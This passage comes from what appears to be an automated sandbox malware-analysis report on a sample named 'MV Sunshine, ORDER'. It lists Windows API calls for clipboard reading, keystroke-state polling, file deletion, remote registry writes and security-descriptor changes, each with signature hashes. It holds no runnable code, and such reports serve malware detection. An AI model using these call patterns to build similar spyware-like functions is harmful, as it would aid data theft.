                        • Part of subcall function 009D8713: CloseHandle.KERNEL32(?,?,009D8851), ref: 009D873A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                      • String ID: $default$winsta0
                      • API String ID: 2063423040-1027155976
                      • Opcode ID: 7281d31086c0469852a21c20343ae5a30584a0b41aa237a2561c29d0e0158c51
                      • Instruction ID: f476e517140f867f25552865ba6a618c4aadc1e57267c67f9a7e14582e997708
                      • Opcode Fuzzy Hash: 7281d31086c0469852a21c20343ae5a30584a0b41aa237a2561c29d0e0158c51
                      • Instruction Fuzzy Hash: FE812B71940249AFDF21DFA4DC45AEF7BBCEF04704F18816AF910B6262DB718E169B60
                      APIs
                      • OpenClipboard.USER32(00A0F910), ref: 009F4284
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 009F4292
                      • GetClipboardData.USER32(0000000D), ref: 009F429A
                      • CloseClipboard.USER32 ref: 009F42A6
                      • GlobalLock.KERNEL32(00000000), ref: 009F42C2
                      • CloseClipboard.USER32 ref: 009F42CC
                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 009F42E1
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 009F42EE
                      • GetClipboardData.USER32(00000001), ref: 009F42F6
                      • GlobalLock.KERNEL32(00000000), ref: 009F4303
                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 009F4337
                      • CloseClipboard.USER32 ref: 009F4447
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                      • String ID:
                      • API String ID: 3222323430-0
                      • Opcode ID: b415140c338319c47a847caf699e7cbca7e84a2520b55bad5c742d31bee7214a
                      • Instruction ID: cd5cb1557512250e60ded8a27dfe97970adbe5053c8bce84c1bdec36841f0ed1
                      • Opcode Fuzzy Hash: b415140c338319c47a847caf699e7cbca7e84a2520b55bad5c742d31bee7214a
                      • Instruction Fuzzy Hash: 5D51A135204209AFD310FFA4DC95FBF77ACAF84B00F104529F656E22A1DB71D9068B62
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 009EC9F8
                      • FindClose.KERNEL32(00000000), ref: 009ECA4C
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009ECA71
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009ECA88
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 009ECAAF
                      • __swprintf.LIBCMT ref: 009ECAFB
                      • __swprintf.LIBCMT ref: 009ECB3E
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                      • __swprintf.LIBCMT ref: 009ECB92
                        • Part of subcall function 009A38D8: __woutput_l.LIBCMT ref: 009A3931
                      • __swprintf.LIBCMT ref: 009ECBE0
                        • Part of subcall function 009A38D8: __flsbuf.LIBCMT ref: 009A3953
                        • Part of subcall function 009A38D8: __flsbuf.LIBCMT ref: 009A396B
                      • __swprintf.LIBCMT ref: 009ECC2F
                      • __swprintf.LIBCMT ref: 009ECC7E
                      • __swprintf.LIBCMT ref: 009ECCCD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 3953360268-2428617273
                      • Opcode ID: 0c4f6176c35d86014d2569ccb3882281f1cb72bdc3fa226a4c378b08a58856a0
                      • Instruction ID: 0fbc8fa5763a9b0930a95640890e2bbe456476464c9f7ef42174e98752ee5c07
                      • Opcode Fuzzy Hash: 0c4f6176c35d86014d2569ccb3882281f1cb72bdc3fa226a4c378b08a58856a0
                      • Instruction Fuzzy Hash: 27A13DB1508344ABC714FBA5C885EBFB7ECFF94700F444929B58697291EB34DA09CB62
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EF221
                      • _wcscmp.LIBCMT ref: 009EF236
                      • _wcscmp.LIBCMT ref: 009EF24D
                      • GetFileAttributesW.KERNEL32(?), ref: 009EF25F
                      • SetFileAttributesW.KERNEL32(?,?), ref: 009EF279
                      • FindNextFileW.KERNEL32(00000000,?), ref: 009EF291
                      • FindClose.KERNEL32(00000000), ref: 009EF29C
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 009EF2B8
                      • _wcscmp.LIBCMT ref: 009EF2DF
                      • _wcscmp.LIBCMT ref: 009EF2F6
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009EF308
                      • SetCurrentDirectoryW.KERNEL32(00A3A5A0), ref: 009EF326
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF330
                      • FindClose.KERNEL32(00000000), ref: 009EF33D
                      • FindClose.KERNEL32(00000000), ref: 009EF34F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1803514871-438819550
                      • Opcode ID: f7fd77189424e4c526bfb9e7747002831594e29302653937c34e061f2fd08a76
                      • Instruction ID: dff23bfb0d651623ce7619868efd8adb42e1ae68a5bd0118b31e3b8a86c3a7b0
                      • Opcode Fuzzy Hash: f7fd77189424e4c526bfb9e7747002831594e29302653937c34e061f2fd08a76
                      • Instruction Fuzzy Hash: 1431D27650025D6EDF21DBB1DC68ADE73ACAF49360F104676F910E3190EB30DE46CA50
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00BDE
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A0F910,00000000,?,00000000,?,?), ref: 00A00C4C
                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A00C94
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A00D1D
                      • RegCloseKey.ADVAPI32(?), ref: 00A0103D
                      • RegCloseKey.ADVAPI32(00000000), ref: 00A0104A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Close$ConnectCreateRegistryValue
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 536824911-966354055
                      • Opcode ID: f19cc596a6a8810678e6785469182c879d10b8704d8ac83bc2516ca0bd052623
                      • Instruction ID: f7f61dc95612f633c6c851477349b86baea796ce36743a343d7f5afdcffb249b
                      • Opcode Fuzzy Hash: f19cc596a6a8810678e6785469182c879d10b8704d8ac83bc2516ca0bd052623
                      • Instruction Fuzzy Hash: EC0225752046159FCB14EF28D891E2AB7E5BF89714F04885DF88A9B3A2DB31ED41CB81
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009EF37E
                      • _wcscmp.LIBCMT ref: 009EF393
                      • _wcscmp.LIBCMT ref: 009EF3AA
                        • Part of subcall function 009E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009E45DC
                      • FindNextFileW.KERNEL32(00000000,?), ref: 009EF3D9
                      • FindClose.KERNEL32(00000000), ref: 009EF3E4
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 009EF400
                      • _wcscmp.LIBCMT ref: 009EF427
                      • _wcscmp.LIBCMT ref: 009EF43E
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009EF450
                      • SetCurrentDirectoryW.KERNEL32(00A3A5A0), ref: 009EF46E
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF478
                      • FindClose.KERNEL32(00000000), ref: 009EF485
                      • FindClose.KERNEL32(00000000), ref: 009EF497
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 1824444939-438819550
                      • Opcode ID: 616c0242b6b2cd4b7d6f8d3d5663253640c8d1c4473e61446dffc2d4a39c3d16
                      • Instruction ID: 108f63f1b4a7abd3bca68ad053da37274335d87011aa74abc0cd21cb5f233dc7
                      • Opcode Fuzzy Hash: 616c0242b6b2cd4b7d6f8d3d5663253640c8d1c4473e61446dffc2d4a39c3d16
                      • Instruction Fuzzy Hash: AA31B77250125D7ECB21EBA5EC98ADE77ACAF49360F104676F850A30E1E730DE45CA54
                      APIs
                        • Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D8766
                        • Part of subcall function 009D874A: GetLastError.KERNEL32(?,009D822A,?,?,?), ref: 009D8770
                        • Part of subcall function 009D874A: GetProcessHeap.KERNEL32(00000008,?,?,009D822A,?,?,?), ref: 009D877F
                        • Part of subcall function 009D874A: HeapAlloc.KERNEL32(00000000,?,009D822A,?,?,?), ref: 009D8786
                        • Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D879D
                        • Part of subcall function 009D87E7: GetProcessHeap.KERNEL32(00000008,009D8240,00000000,00000000,?,009D8240,?), ref: 009D87F3
                        • Part of subcall function 009D87E7: HeapAlloc.KERNEL32(00000000,?,009D8240,?), ref: 009D87FA
                        • Part of subcall function 009D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009D8240,?), ref: 009D880B
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009D825B
                      • _memset.LIBCMT ref: 009D8270
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009D828F
                      • GetLengthSid.ADVAPI32(?), ref: 009D82A0
                      • GetAce.ADVAPI32(?,00000000,?), ref: 009D82DD
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009D82F9
                      • GetLengthSid.ADVAPI32(?), ref: 009D8316
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009D8325
                      • HeapAlloc.KERNEL32(00000000), ref: 009D832C
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009D834D
                      • CopySid.ADVAPI32(00000000), ref: 009D8354
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009D8385
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D83AB
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009D83BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
                      • Instruction ID: 832a976239967299e0de6d9ea93d9759526cc320506ea626c7642c3f7577c87c
                      • Opcode Fuzzy Hash: 86ef76815959252559b49089bc5d6cfe5c0c22fd03ce56e665aa98e0d85802af
                      • Instruction Fuzzy Hash: AB614E71940209EFDF10DF94DC89AEEBBB9FF04710F14816AF915A7292DB319A16CB60
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                      • API String ID: 0-4052911093
                      • Opcode ID: 72b3ac179eda186f40dced9fe8e3935514fea05521e517df33f02529f33ac486
                      • Instruction ID: 42d72fbbf3271b56d1a8646a3db3aa185e9783899228148a58b6dcfcc3cee7ee
                      • Opcode Fuzzy Hash: 72b3ac179eda186f40dced9fe8e3935514fea05521e517df33f02529f33ac486
                      • Instruction Fuzzy Hash: 19727F72E002199BDF24CF58D8907AEB7B5FF48310F14856AE959EB390EB749D81CB90
                      APIs
                        • Part of subcall function 00A010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00737
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A007D6
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A0086E
                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A00AAD
                      • RegCloseKey.ADVAPI32(00000000), ref: 00A00ABA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                      • String ID:
                      • API String ID: 1240663315-0
                      • Opcode ID: 373fc798cdf5576e2a04d77cf76b861ce73264c014cf1dc5d3bbcffe758a384e
                      • Instruction ID: 2a3e4a10319f7bfbeb4076bd1267b1ee55c07796bcef767c38797e4de3197d44
                      • Opcode Fuzzy Hash: 373fc798cdf5576e2a04d77cf76b861ce73264c014cf1dc5d3bbcffe758a384e
                      • Instruction Fuzzy Hash: 58E13B31204214AFCB14DF28D895E6ABBE4FF89754F04896DF48ADB2A2DB30E905CB51
                      APIs
                      • GetKeyboardState.USER32(?), ref: 009E0241
                      • GetAsyncKeyState.USER32(000000A0), ref: 009E02C2
                      • GetKeyState.USER32(000000A0), ref: 009E02DD
                      • GetAsyncKeyState.USER32(000000A1), ref: 009E02F7
                      • GetKeyState.USER32(000000A1), ref: 009E030C
                      • GetAsyncKeyState.USER32(00000011), ref: 009E0324
                      • GetKeyState.USER32(00000011), ref: 009E0336
                      • GetAsyncKeyState.USER32(00000012), ref: 009E034E
                      • GetKeyState.USER32(00000012), ref: 009E0360
                      • GetAsyncKeyState.USER32(0000005B), ref: 009E0378
                      • GetKeyState.USER32(0000005B), ref: 009E038A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: 2e5870f4c211f690ec7065c457b41a2759b1fd0d00d50f020f4ab702390dd0ad
                      • Instruction ID: a77d35e189cbcb194062a1b0087539e45a157eb5204e5b9c9580b495cbc9a04b
                      • Opcode Fuzzy Hash: 2e5870f4c211f690ec7065c457b41a2759b1fd0d00d50f020f4ab702390dd0ad
                      • Instruction Fuzzy Hash: 4941EB245047CA6EFF338AA588083B5BEE87F91340F08509DD6C6566C2E7E55DC8C7A2
                      APIs
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • CoInitialize.OLE32 ref: 009F8718
                      • CoUninitialize.OLE32 ref: 009F8723
                      • CoCreateInstance.OLE32(?,00000000,00000017,00A12BEC,?), ref: 009F8783
                      • IIDFromString.OLE32(?,?), ref: 009F87F6
                      • VariantInit.OLEAUT32(?), ref: 009F8890
                      • VariantClear.OLEAUT32(?), ref: 009F88F1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 834269672-1287834457
                      • Opcode ID: 4830a9a829a12a3a3b638757169e44cad3faffc9a1453056ef060973d42217ec
                      • Instruction ID: c715806debd47b1b4ca7aee2bf58df9659d22a17a0f4565f28ec034c2a5d90ee
                      • Opcode Fuzzy Hash: 4830a9a829a12a3a3b638757169e44cad3faffc9a1453056ef060973d42217ec
                      • Instruction Fuzzy Hash: CA61D130608305AFD750EF64C888B6FBBE8AF84754F14481DFA959B291CB34ED49CB92
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: fe3af6abf904224729df5073fae833bfb97aca297007daeb288c3d9b3add7465
                      • Instruction ID: 81b511bc70b9a441670e49d8d8a5119dd274b3d2568d3a922139a9e9f275a04f
                      • Opcode Fuzzy Hash: fe3af6abf904224729df5073fae833bfb97aca297007daeb288c3d9b3add7465
                      • Instruction Fuzzy Hash: 2B21A3352002189FDB20EFA4EC49B7A77A8EF44710F148026F946EB271CB75AC02CB95
                      APIs
                        • Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE
                        • Part of subcall function 009E4CD3: GetFileAttributesW.KERNEL32(?,009E3947), ref: 009E4CD4
                      • FindFirstFileW.KERNEL32(?,?), ref: 009E3ADF
                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 009E3B87
                      • MoveFileW.KERNEL32(?,?), ref: 009E3B9A
                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 009E3BB7
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009E3BD9
                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009E3BF5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                      • String ID: \*.*
                      • API String ID: 4002782344-1173974218
                      • Opcode ID: 1fbb9a521eda0cd644708e492faa66fd23da97aa4c9f118a28bea7e4e459cf49
                      • Instruction ID: 71e29a96e6e4710b73bb2361f4635626d1531be319f75bc8d1df1bef372999c4
                      • Opcode Fuzzy Hash: 1fbb9a521eda0cd644708e492faa66fd23da97aa4c9f118a28bea7e4e459cf49
                      • Instruction Fuzzy Hash: 5C51403180514D9ACF16FBE1CD96AEDB7B8AF54300F644165E44277191DF219F09CB51
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 009EF6AB
                      • Sleep.KERNEL32(0000000A), ref: 009EF6DB
                      • _wcscmp.LIBCMT ref: 009EF6EF
                      • _wcscmp.LIBCMT ref: 009EF70A
                      • FindNextFileW.KERNEL32(?,?), ref: 009EF7A8
                      • FindClose.KERNEL32(00000000), ref: 009EF7BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                      • String ID: *.*
                      • API String ID: 713712311-438819550
                      • Opcode ID: a5dffddc377f70f08dc0c3542b07c547c6b338773f2ccf5ad8c3056cc7b95298
                      • Instruction ID: 5634fe396c13fe81233d00d56becb5746ff522c22460564aef3244777fd3ca95
                      • Opcode Fuzzy Hash: a5dffddc377f70f08dc0c3542b07c547c6b338773f2ccf5ad8c3056cc7b95298
                      • Instruction Fuzzy Hash: 1941907190025EAFCF15EFA5CC99AEEBBB8FF05310F144566E814A22A1DB319E45CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
